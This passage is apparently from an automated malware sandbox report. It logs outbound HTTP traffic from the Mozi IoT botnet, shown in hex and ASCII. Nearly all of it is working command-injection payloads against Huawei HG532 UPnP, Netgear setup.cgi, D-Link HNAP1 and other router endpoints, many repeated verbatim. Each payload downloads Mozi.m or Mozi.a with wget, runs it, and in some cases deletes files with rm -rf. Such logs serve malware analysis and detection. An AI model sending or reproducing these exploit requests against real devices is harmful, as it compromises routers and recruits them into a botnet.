6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 177.171.143.161:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 169.30.77.109:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 13.209.203.228:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 212.59.33.56:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 221.127.103.77:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 195.121.56.192:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 196.110.129.112:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
